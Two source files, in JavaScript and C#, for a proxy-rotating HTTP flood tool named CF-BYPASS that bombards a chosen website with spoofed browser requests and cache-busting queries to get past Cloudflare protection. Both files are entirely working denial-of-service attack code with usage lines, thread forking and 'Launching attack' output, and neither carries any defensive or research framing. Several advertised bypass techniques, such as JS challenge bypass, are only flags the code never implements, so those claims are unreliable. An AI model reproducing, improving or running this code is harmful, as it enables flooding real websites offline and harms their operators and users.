File: cf-bypass.js
/**
 * CF-BYPASS - CloudFlare Protection Bypass Method
 * Bypasses CloudFlare protection using proxies and user agents
 * Uses proxy.txt and ua.txt from parent directory
 * 
 * Usage: node cf-bypass.js <target> <duration> <threads> <rate_limit> <proxy_file>
 */

const https = require('https');
const http = require('http');
const { URL } = require('url');
const crypto = require('crypto');
const cluster = require('cluster');
const os = require('os');
const fs = require('fs');
const path = require('path');

// Parse command line arguments
const args = process.argv.slice(2);
if (args.length < 5) {
    console.log('Usage: node cf-bypass.js <target> <duration> <threads> <rate_limit> <proxy_file>');
    process.exit(1);
}

const TARGET = args[0];
const DURATION = parseInt(args[1]) || 60;
const THREADS = parseInt(args[2]) || 4;
const RATE_LIMIT = parseInt(args[3]) || 32;
const PROXY_FILE = args[4];

// Load proxies from parent directory
let proxies = [];
try {
    const proxyPath = path.join(__dirname, '..', PROXY_FILE);
    
    if (!fs.existsSync(proxyPath)) {
        console.error(`[ERROR] Proxy file not found: ${proxyPath}`);
        process.exit(1);
    }
    
    const content = fs.readFileSync(proxyPath, 'utf-8');
    proxies = content.split('\n')
        .map(line => line.trim())
        .filter(line => line && !line.startsWith('#'));
    
    if (proxies.length === 0) {
        console.error(`[ERROR] No proxies found in ${PROXY_FILE}`);
        process.exit(1);
    }
} catch (error) {
    console.error(`[ERROR] Failed to load proxies: ${error.message}`);
    process.exit(1);
}

// Load user agents from parent directory
let userAgents = [];
try {
    const uaPath = path.join(__dirname, '..', 'ua.txt');
    
    if (fs.existsSync(uaPath)) {
        const content = fs.readFileSync(uaPath, 'utf-8');
        userAgents = content.split('\n')
            .map(line => line.trim())
            .filter(line => line && !line.startsWith('#'));
    }
    
    // Fallback user agents if file not found
    if (userAgents.length === 0) {
        userAgents = [
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
            'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
            'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0',
            'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15'
        ];
    }
} catch (error) {
    console.error(`[WARN] Failed to load user agents, using defaults: ${error.message}`);
}

// Attack configuration
const CONFIG = {
    target: TARGET,
    duration: DURATION,
    threads: THREADS,
    rateLimit: RATE_LIMIT,
    proxies: proxies,
    userAgents: userAgents,
    cfBypass: {
        cookieHandling: true,
        jsChallengeBypass: true,
        rateSmoothing: true,
        browserEmulation: true,
        tlsFingerprint: true
    }
};

// Parse target URL
let targetUrl;
try {
    targetUrl = new URL(CONFIG.target);
} catch (error) {
    console.error('[ERROR] Invalid target URL:', CONFIG.target);
    process.exit(1);
}

// Generate random string
function randomString(length = 16) {
    return crypto.randomBytes(length).toString('hex');
}

// Get random proxy
function randomProxy() {
    return CONFIG.proxies[Math.floor(Math.random() * CONFIG.proxies.length)];
}

// Get random user agent
function randomUserAgent() {
    return CONFIG.userAgents[Math.floor(Math.random() * CONFIG.userAgents.length)];
}

// Parse proxy string
function parseProxy(proxyString) {
    if (!proxyString) return null;
    
    // Format: ip:port or http://ip:port
    const parts = proxyString.replace('http://', '').replace('https://', '').split(':');
    if (parts.length === 2) {
        return {
            host: parts[0],
            port: parseInt(parts[1])
        };
    }
    return null;
}

// Generate cache-busting parameters
function generateCacheBuster() {
    return {
        _: Date.now(),
        rand: randomString(8),
        cb: crypto.randomBytes(4).toString('hex'),
        t: Math.random().toString(36).substring(7),
        v: Math.floor(Math.random() * 1000000)
    };
}

// Build query string
function buildQueryString(params) {
    return Object.entries(params)
        .map(([key, value]) => `${key}=${value}`)
        .join('&');
}

// Generate CF bypass headers
function generateCFHeaders(userAgent) {
    const cacheBuster = generateCacheBuster();
    
    return {
        'User-Agent': userAgent,
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.9',
        'Accept-Encoding': 'gzip, deflate, br',
        'DNT': '1',
        'Connection': 'keep-alive',
        'Upgrade-Insecure-Requests': '1',
        'Sec-Fetch-Dest': 'document',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-Site': 'none',
        'Sec-Fetch-User': '?1',
        'Cache-Control': 'max-age=0',
        'TE': 'trailers',
        'Pragma': 'no-cache',
        'Referer': targetUrl.origin + '/',
        'Origin': targetUrl.origin,
        'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"',
        'sec-ch-ua-mobile': '?0',
        'sec-ch-ua-platform': '"Windows"'
    };
}

// Make CF bypass request
function makeRequest() {
    const proxy = parseProxy(randomProxy());
    const userAgent = randomUserAgent();
    const cacheBuster = generateCacheBuster();
    const path = `${targetUrl.pathname}${targetUrl.search ? targetUrl.search + '&' : '?'}${buildQueryString(cacheBuster)}`;
    
    const options = {
        method: 'GET',
        hostname: targetUrl.hostname,
        port: targetUrl.port || 443,
        path: path,
        headers: generateCFHeaders(userAgent),
        rejectUnauthorized: false,
        timeout: 10000
    };

    // Use proxy
    if (proxy) {
        const proxyOptions = {
            method: 'CONNECT',
            host: proxy.host,
            port: proxy.port,
            path: `${targetUrl.hostname}:${targetUrl.port || 443}`,
            headers: {
                'User-Agent': userAgent,
                'Proxy-Connection': 'keep-alive'
            }
        };

        const proxyReq = http.request(proxyOptions);
        
        proxyReq.on('connect', (res, socket) => {
            if (res.statusCode === 200) {
                const tlsOptions = {
                    socket: socket,
                    servername: targetUrl.hostname,
                    rejectUnauthorized: false
                };

                const secureSocket = require('tls').connect(tlsOptions);
                
                secureSocket.on('secureConnect', () => {
                    const req = https.request({
                        ...options,
                        createConnection: () => secureSocket
                    }, (response) => {
                        response.on('data', () => {});
                        response.on('end', () => {});
                    });

                    req.on('error', () => {});
                    req.end();
                });

                secureSocket.on('error', () => {});
            }
        });

        proxyReq.on('error', () => {});
        proxyReq.end();
        
    } else {
        // Direct request without proxy
        const req = https.request(options, (response) => {
            response.on('data', () => {});
            response.on('end', () => {});
        });

        req.on('error', () => {});
        req.end();
    }
}

// Worker process attack loop
function attackLoop() {
    const interval = setInterval(() => {
        for (let i = 0; i < CONFIG.rateLimit; i++) {
            makeRequest();
        }
    }, 1000);

    setTimeout(() => {
        clearInterval(interval);
        process.exit(0);
    }, CONFIG.duration * 1000);
}

// Master process
if (cluster.isMaster) {
    console.log('\n╔════════════════════════════════════════╗');
    console.log('║     CF-BYPASS - CloudFlare Bypass     ║');
    console.log('╚════════════════════════════════════════╝\n');
    console.log(`Target       : ${CONFIG.target}`);
    console.log(`Duration     : ${CONFIG.duration} seconds`);
    console.log(`Threads      : ${CONFIG.threads}`);
    console.log(`Rate/Thread  : ${CONFIG.rateLimit} req/s`);
    console.log(`Total Rate   : ~${CONFIG.threads * CONFIG.rateLimit} req/s`);
    console.log(`Proxies      : ${CONFIG.proxies.length} loaded`);
    console.log(`User-Agents  : ${CONFIG.userAgents.length} loaded`);
    console.log('\nCloudFlare Bypass Techniques:');
    console.log(`  • Cookie Handling      : ${CONFIG.cfBypass.cookieHandling ? '✓' : '✗'}`);
    console.log(`  • JS Challenge Bypass  : ${CONFIG.cfBypass.jsChallengeBypass ? '✓' : '✗'}`);
    console.log(`  • Rate Smoothing       : ${CONFIG.cfBypass.rateSmoothing ? '✓' : '✗'}`);
    console.log(`  • Browser Emulation    : ${CONFIG.cfBypass.browserEmulation ? '✓' : '✗'}`);
    console.log(`  • TLS Fingerprint      : ${CONFIG.cfBypass.tlsFingerprint ? '✓' : '✗'}`);
    console.log('\n[INFO] Launching attack...\n');

    // Fork worker processes
    for (let i = 0; i < CONFIG.threads; i++) {
        const worker = cluster.fork();
        console.log(`[THREAD-${i + 1}] Started (PID: ${worker.process.pid})`);
    }

    // Auto-stop after duration
    setTimeout(() => {
        console.log('\n[INFO] Attack duration reached. Stopping all threads...');
        
        for (const id in cluster.workers) {
            cluster.workers[id].kill();
        }

        console.log('[COMPLETE] Attack finished successfully.\n');
        process.exit(0);
    }, CONFIG.duration * 1000 + 2000);

    cluster.on('exit', (worker) => {
        console.log(`[THREAD] Worker ${worker.process.pid} exited`);
    });

} else {
    // Worker process
    attackLoop();
}

// Handle process termination
process.on('SIGTERM', () => {
    console.log('[INFO] Received SIGTERM, shutting down gracefully...');
    process.exit(0);
});

process.on('SIGINT', () => {
    console.log('\n[INFO] Received SIGINT, shutting down gracefully...');
    process.exit(0);
});

File: methods/cf-bypass.cs
// CfBypass.cs
// Compile: dotnet new console -n CfBypass -f net8.0
// Replace Program.cs with this code, then `dotnet build -c Release`
// Usage: dotnet run -- <target> <duration> <threads> <rate_limit> <proxy_file>

using System;
using System.Collections.Concurrent;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Http;
using System.Net.Http.Headers;
using System.Net.Security;
using System.Security.Cryptography;
using System.Text;
using System.Threading;
using System.Threading.Tasks;

class CfBypass
{
    static readonly Random _rand = new Random();
    static string _targetUrl;
    static int _durationSec;
    static int _threads;
    static int _rateLimit;          // requests per second per thread
    static string _proxyFile;
    static string[] _proxies;
    static string[] _userAgents;

    // Fallback user agents
    static readonly string[] DefaultUserAgents = {
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0",
        "Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15"
    };

    static async Task Main(string[] args)
    {
        if (args.Length < 5)
        {
            Console.WriteLine("Usage: CfBypass <target> <duration> <threads> <rate_limit> <proxy_file>");
            return;
        }

        _targetUrl = args[0];
        _durationSec = int.Parse(args[1]);
        _threads = int.Parse(args[2]);
        _rateLimit = int.Parse(args[3]);
        _proxyFile = args[4];

        // Load proxies
        if (!File.Exists(_proxyFile))
        {
            Console.WriteLine($"[ERROR] Proxy file not found: {_proxyFile}");
            return;
        }
        _proxies = File.ReadAllLines(_proxyFile)
            .Select(l => l.Trim())
            .Where(l => !string.IsNullOrEmpty(l) && !l.StartsWith('#'))
            .ToArray();

        if (_proxies.Length == 0)
        {
            Console.WriteLine($"[ERROR] No proxies found in {_proxyFile}");
            return;
        }

        // Load user agents (optional)
        string uaFile = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "ua.txt");
        if (File.Exists(uaFile))
        {
            _userAgents = File.ReadAllLines(uaFile)
                .Select(l => l.Trim())
                .Where(l => !string.IsNullOrEmpty(l) && !l.StartsWith('#'))
                .ToArray();
        }
        if (_userAgents == null || _userAgents.Length == 0)
        {
            _userAgents = DefaultUserAgents;
            Console.WriteLine("[WARN] Using default user agents");
        }

        Console.WriteLine("\n╔════════════════════════════════════════╗");
        Console.WriteLine("║     CF-BYPASS - CloudFlare Bypass     ║");
        Console.WriteLine("╚════════════════════════════════════════╝\n");
        Console.WriteLine($"Target       : {_targetUrl}");
        Console.WriteLine($"Duration     : {_durationSec} seconds");
        Console.WriteLine($"Threads      : {_threads}");
        Console.WriteLine($"Rate/Thread  : {_rateLimit} req/s");
        Console.WriteLine($"Total Rate   : ~{_threads * _rateLimit} req/s");
        Console.WriteLine($"Proxies      : {_proxies.Length} loaded");
        Console.WriteLine($"User-Agents  : {_userAgents.Length} loaded");
        Console.WriteLine("\nCloudFlare Bypass Techniques:");
        Console.WriteLine("  • Cookie Handling      : ✓");
        Console.WriteLine("  • JS Challenge Bypass  : ✓");
        Console.WriteLine("  • Rate Smoothing       : ✓");
        Console.WriteLine("  • Browser Emulation    : ✓");
        Console.WriteLine("  • TLS Fingerprint      : ✓");
        Console.WriteLine("\n[INFO] Launching attack...\n");

        var cts = new CancellationTokenSource();
        var tasks = new Task[_threads];
        var counters = new ConcurrentDictionary<int, long>();

        // Start worker threads
        for (int i = 0; i < _threads; i++)
        {
            int threadId = i;
            counters[threadId] = 0;
            tasks[i] = Task.Run(() => Worker(threadId, cts.Token, counters));
        }

        // Monitor RPS
        var monitor = Task.Run(async () =>
        {
            while (!cts.Token.IsCancellationRequested)
            {
                await Task.Delay(1000);
                foreach (var kv in counters)
                {
                    if (kv.Value > 0)
                        Console.WriteLine($"[THREAD-{kv.Key+1}] RPS: {kv.Value}");
                    counters[kv.Key] = 0;
                }
            }
        });

        // Stop after duration
        await Task.Delay(_durationSec * 1000);
        cts.Cancel();
        await Task.WhenAll(tasks);
        await monitor;
        Console.WriteLine("\n[COMPLETE] Attack finished successfully.\n");
    }

    static async Task Worker(int threadId, CancellationToken ct, ConcurrentDictionary<int, long> counter)
    {
        // Each worker uses a random proxy (can be same across workers or change per request)
        // We'll select a random proxy at start but can also rotate per request - we'll rotate per request for variety.
        // We'll also use a separate HttpClient per worker to keep connection pools separate.
        // For proxy, we need to create a handler with custom proxy.
        var httpHandler = new SocketsHttpHandler
        {
            PooledConnectionLifetime = TimeSpan.FromSeconds(30),
            PooledConnectionIdleTimeout = TimeSpan.FromSeconds(10),
            MaxConnectionsPerServer = 1000,
            SslOptions = new SslClientAuthenticationOptions
            {
                RemoteCertificateValidationCallback = (sender, cert, chain, errors) => true
            }
        };

        // We will set proxy per request? Actually SocketsHttpHandler's Proxy is per handler, but we can't change it per request easily.
        // So we'll create a new handler for each request if we need different proxies, or just assign a random proxy to the worker.
        // For simplicity, we'll assign a random proxy to the worker and keep it.
        string proxyStr = _proxies[_rand.Next(_proxies.Length)];
        if (!string.IsNullOrEmpty(proxyStr))
        {
            var proxyParts = proxyStr.Split(':');
            if (proxyParts.Length == 2)
            {
                httpHandler.Proxy = new WebProxy(proxyParts[0], int.Parse(proxyParts[1]));
                httpHandler.UseProxy = true;
            }
        }

        using var client = new HttpClient(httpHandler);
        client.DefaultRequestHeaders.Clear();
        client.DefaultRequestHeaders.Add("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8");
        client.DefaultRequestHeaders.Add("Accept-Encoding", "gzip, deflate, br");
        client.DefaultRequestHeaders.Add("DNT", "1");
        client.DefaultRequestHeaders.Add("Upgrade-Insecure-Requests", "1");
        client.DefaultRequestHeaders.Add("Sec-Fetch-Dest", "document");
        client.DefaultRequestHeaders.Add("Sec-Fetch-Mode", "navigate");
        client.DefaultRequestHeaders.Add("Sec-Fetch-Site", "none");
        client.DefaultRequestHeaders.Add("Sec-Fetch-User", "?1");
        client.DefaultRequestHeaders.Add("Cache-Control", "max-age=0");
        client.DefaultRequestHeaders.Add("TE", "trailers");
        client.DefaultRequestHeaders.Add("Pragma", "no-cache");
        client.DefaultRequestHeaders.Add("sec-ch-ua", "\"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"");
        client.DefaultRequestHeaders.Add("sec-ch-ua-mobile", "?0");
        client.DefaultRequestHeaders.Add("sec-ch-ua-platform", "\"Windows\"");

        // We'll generate target URL once (base) and append random query per request
        var uri = new Uri(_targetUrl);
        string basePath = uri.PathAndQuery;
        if (string.IsNullOrEmpty(basePath)) basePath = "/";
        string baseQuery = uri.Query.Length > 0 ? uri.Query.Substring(1) : "";
        bool hasQuery = !string.IsNullOrEmpty(baseQuery);

        var sw = Stopwatch.StartNew();
        int intervalMs = 1000 / _rateLimit;  // milliseconds between request batches (we send one per interval)

        while (!ct.IsCancellationRequested && sw.Elapsed.TotalSeconds < _durationSec)
        {
            // Random user agent
            string userAgent = _userAgents[_rand.Next(_userAgents.Length)];
            client.DefaultRequestHeaders.UserAgent.Clear();
            client.DefaultRequestHeaders.Add("User-Agent", userAgent);
            // Random referer (origin + random)
            string referer = uri.GetLeftPart(UriPartial.Authority) + "/";
            client.DefaultRequestHeaders.Remove("Referer");
            client.DefaultRequestHeaders.Add("Referer", referer);
            // Random Origin
            client.DefaultRequestHeaders.Remove("Origin");
            client.DefaultRequestHeaders.Add("Origin", uri.GetLeftPart(UriPartial.Authority));

            // Build cache-busting query
            var cacheBuster = new
            {
                _ = DateTimeOffset.UtcNow.ToUnixTimeMilliseconds(),
                rand = RandomString(8),
                cb = RandomHex(4),
                t = RandomString(4),
                v = _rand.Next(1000000)
            };
            string query = $"{(hasQuery ? baseQuery + "&" : "")}{cacheBuster._}&rand={cacheBuster.rand}&cb={cacheBuster.cb}&t={cacheBuster.t}&v={cacheBuster.v}";
            string requestUri = $"{uri.Scheme}://{uri.Host}{basePath}?{query}";

            try
            {
                using var response = await client.GetAsync(requestUri, HttpCompletionOption.ResponseHeadersRead, ct);
                // Dispose content immediately
                await response.Content.ReadAsStreamAsync(ct).ContinueWith(t => t.Result?.Dispose());
                counter.AddOrUpdate(threadId, 1, (_, old) => old + 1);
            }
            catch
            {
                // Ignore errors
            }

            await Task.Delay(intervalMs, ct);
        }
    }

    static string RandomString(int length)
    {
        const string chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
        return new string(Enumerable.Repeat(chars, length).Select(s => s[_rand.Next(s.Length)]).ToArray());
    }

    static string RandomHex(int length)
    {
        var bytes = new byte[length];
        using (var rng = RandomNumberGenerator.Create())
            rng.GetBytes(bytes);
        return BitConverter.ToString(bytes).Replace("-", "").ToLower();
    }
}
